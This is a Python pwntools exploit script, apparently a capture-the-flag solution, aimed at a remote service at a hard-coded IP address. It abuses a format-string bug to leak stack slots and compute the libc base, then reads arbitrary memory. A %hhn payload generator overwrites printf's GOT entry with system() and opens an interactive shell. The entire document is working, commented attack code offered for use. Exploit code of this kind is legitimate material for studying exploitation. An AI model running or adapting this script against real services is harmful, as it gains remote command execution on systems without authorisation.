- ```from pwn import *
# Remote target of the exploit and the pwntools context used by p64()/u64().
host, port = '78.46.224.86', 1337
context.update(os='linux', arch='amd64')
# One persistent connection; every format-string probe below reuses it, so an
# EOF on `p` (remote crash) ends the whole run.
p = remote(host, port)
def dump_stack(at=None, n=2048):
    """Leak n//8 stack slots through the remote's format-string bug.

    With `at`, the request is "%K$p." for K = at .. at+n//8-1 (positional
    reads); without it, a run of sequential "%p". The reply is cut at the
    "END" marker, stripped of surrounding dots, split on "." and the first
    field is dropped (NOTE(review): this discards either an echoed prefix or
    the first leak itself -- confirm against the service's output format).
    "(nil)" fields become 0; everything else is parsed as hex.

    Returns a list of ints, one per slot.
    """
    slots = n // 8
    if at:
        fmt = "".join("%{}$p.".format(at + k) for k in range(slots))
    else:
        fmt = ".%p" * slots
    p.sendline(fmt + "END")
    raw = p.readuntil("END")[:-3].strip().strip(".")
    fields = raw.split(".")[1:]
    return [0 if "nil" in field else int(field, 16) for field in fields]
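def fmtleaker(addr):
    """Read the NUL-terminated string at `addr` via "%8$s" (arbitrary read).

    The payload is "AAAA%8$s.ENDBBBB" + p64(addr): the 16-byte format string
    occupies positional arguments 6 and 7 (8 bytes each, see buffer_start),
    so argument 8 is the appended pointer. The leak is whatever the remote
    prints between the "AAAA" and ".ENDBBBB" markers.

    Returns the leaked bytes (at least one byte: an empty leak means the
    first byte at `addr` is NUL and is returned as "\\x00"), or None when the
    pointer cannot be sent (it contains "\\n", which sendline() would split
    on) or no reply with both markers arrived after up to 3 attempts on the
    shared connection `p`.
    """
    log.debug("leaking addr 0x{:x}".format(addr))
    pl = "AAAA%8$s.ENDBBBB" + p64(addr)
    if "\n" in pl:
        # A 0x0a byte in the address would terminate the line early and the
        # pointer would never reach argument 8.
        log.warning("newline in payload!")
        return None
    for attempt in range(3):
        try:
            p.sendline(pl)
            x = p.recv(1024)
        except KeyboardInterrupt:
            raise
        except EOFError:
            # Shared tube is dead; the next attempt will raise again and the
            # loop ends with None, matching the old retry behaviour.
            log.debug("got EOF for leaking addr 0x{:x}".format(addr))
            continue
        except Exception:
            log.warning("got exception...", exc_info=sys.exc_info())
            continue
        res = _between_markers(x)
        if res is not None:
            return res or "\x00"
        log.debug("attempt {}: markers missing in reply for 0x{:x}".format(attempt, addr))
    return None


def _between_markers(reply):
    """Return the bytes between "AAAA" and ".ENDBBBB" in `reply`.

    Returns None if `reply` is empty or either marker is absent. (Slicing
    with a find() result of -1, as the previous version did, silently
    produced garbage instead of reporting a failed leak.)
    """
    if not reply:
        return None
    start = reply.find("AAAA")
    if start < 0:
        return None
    start += 4
    end = reply.find(".ENDBBBB", start)
    if end < 0:
        return None
    return reply[start:end]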
def print_got():
    """Dump the first three 8-byte GOT slots starting at bin_got_addr.

    Each slot is leaked byte-wise with fmtleaker(); a read that fails
    contributes a 0xff filler byte so the dump still lines up. Prints one
    "<slot address>: <slot value>" line per slot.
    """
    for slot in range(3):
        slot_addr = bin_got_addr + slot * 8
        got = ''
        while len(got) < 8:
            chunk = fmtleaker(slot_addr + len(got))
            got += chunk if chunk else "\xff"
        print(hex(slot_addr) + ": " + hex(u64(got[:8])))
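# Target layout (non-PIE binary loaded at 0x400000); the GOT offset and the
# printf slot offset are specific to this binary.
bin_addr = 0x400000
bin_got_addr = bin_addr + 0x201000
printf_got = bin_got_addr + 0x18
# libc offsets: specific to the remote's libc build. They must be regenerated
# (from a leaked or matched libc) before reusing this script elsewhere;
# offsets that do not match produce a garbage libc_system below.
offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0
offset_dup2 = 0x00000000000f8380
offset_read = 0x00000000000f7c60
offset_write = 0x00000000000f7cc0
offset_str_bin_sh = 0x189fc0
offset_puts = 0x0000000000070960
# Stack slot expected to hold the return address into __libc_start_main.
libc_index = 37
stack = dump_stack(libc_index, 16)
if not stack or not stack[0]:
    # log.error() aborts: without a leak every address below is wrong.
    log.error("no libc leak at stack index {}: {!r}".format(libc_index, stack))
libc_stack = stack[0]
libc_address = libc_stack - offset___libc_start_main_ret
if libc_address & 0xfff:
    # A real libc base is page-aligned. Anything else means the stack index
    # or the libc offsets do not match the remote, and the GOT overwrite
    # would redirect printf to garbage rather than system().
    log.error("libc base 0x{:x} is not page-aligned: wrong index or libc offsets".format(libc_address))
libc_bin_sh = libc_address + offset_str_bin_sh
libc_system = libc_address + offset_system
libc_puts = libc_address + offset_puts
log.info("libc_address: " + hex(libc_address))
# Leaking "/bin/sh" back is a cheap end-to-end check of the libc base.
log.info("libc_bin_sh: {}({})".format(hex(libc_bin_sh), fmtleaker(libc_bin_sh)))
log.info("libc_system: " + hex(libc_system))
log.info("bin_got_addr: " + hex(bin_got_addr))
log.info("printf_got: " + hex(printf_got))
log.info("got befor:")
print_got()
# Positional printf argument that overlays the first 8 bytes of our input.
buffer_start = 6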
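class PayloadGenerator:
    """Build a "%hhn" format-string payload that writes arbitrary bytes.

    Every queued (address, byte) pair becomes one "%<idx>$hhn" conversion;
    the padding in front of it ("%.<N>x" or literal "A"s) raises printf's
    output counter to the byte value. The target pointers are appended after
    the format string, which is padded to a multiple of 8 bytes, so pointer
    k sits at positional argument index + len(format) // 8 + k, where
    `index` is the argument that overlays byte 0 of our input.

    The format-string length and the argument indices depend on each other
    (a two-digit index is one character longer than a one-digit one), so
    payload_len() iterates until both agree instead of rendering with a
    dummy index and hoping the digit count matches.
    """

    def __init__(self, index=0):
        # index: positional printf argument mapping onto the start of input.
        self.mem = []
        self.index = index

    def write(self, where, what, nbytes=5):
        """Queue a little-endian write of the low `nbytes` bytes of `what`
        to `where`.

        The default of 5 leaves the upper 3 bytes of the qword untouched,
        which is only correct when the slot already holds a pointer into
        the same mapping (e.g. another libc address in the GOT); pass
        nbytes=8 to overwrite the whole qword.
        """
        what = int(what)
        for i in range(nbytes):
            self.mem.append((where + i, (what >> (i * 8)) & 0xFF))

    def _sorted_mem(self):
        """Queued writes ordered by byte value, so the counter only grows."""
        return sorted(self.mem, key=operator.itemgetter(1))

    def _format_writes(self, first_index):
        """Render the format-string part assuming the first queued pointer
        is positional argument `first_index`; padded with "A" to a multiple
        of 8 bytes (always 1..8 bytes of padding, as before)."""
        parts = []
        printed = 0  # characters printf has emitted so far
        index = first_index
        for _addr, value in self._sorted_mem():
            if value != printed:
                delta = value - printed
                # "%x" consumes a 32-bit argument (at most 8 hex digits), so
                # a precision above 8 pins the output to exactly `delta`
                # characters; for smaller gaps literal padding is used.
                if delta > 8:
                    parts.append("%." + str(delta) + "x")
                else:
                    parts.append("A" * delta)
                printed = value
            parts.append("%" + str(index) + "$hhn")
            index += 1
        fmt = "".join(parts)
        return fmt + "A" * (8 - (len(fmt) % 8))

    def payload_len(self):
        """Return the length in bytes of the format-string part, rendered
        with argument indices that are consistent with that length.

        Starts from the smallest possible index and re-renders until the
        index derived from the length equals the one used to render it.
        Raises ValueError if that never happens within 32 rounds.
        """
        guess = self.index + 1
        for _ in range(32):
            length = len(self._format_writes(guess))
            derived = length // 8 + self.index
            if derived == guess:
                return length
            guess = derived
        raise ValueError("format-string length did not converge")

    def gen(self):
        """Return the full payload: the format string followed by one p64
        pointer per queued byte, in the same order as the %hhn conversions."""
        first_index = self.payload_len() // 8 + self.index
        fmt = self._format_writes(first_index)
        return fmt + "".join(p64(addr) for addr, _value in self._sorted_mem())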
# Overwrite printf@GOT with system(): the same format-string call that leaks
# memory then runs our next input line as a shell command.
gen = PayloadGenerator(buffer_start)
gen.write(printf_got, libc_system)
payload = gen.gen()
print(hexdump(payload, width=8))
p.sendline(payload)
# Response to the write itself (may be empty or block briefly).
print(p.recv(1024))
p.interactive()
log.info("got after: ")
- print_got()```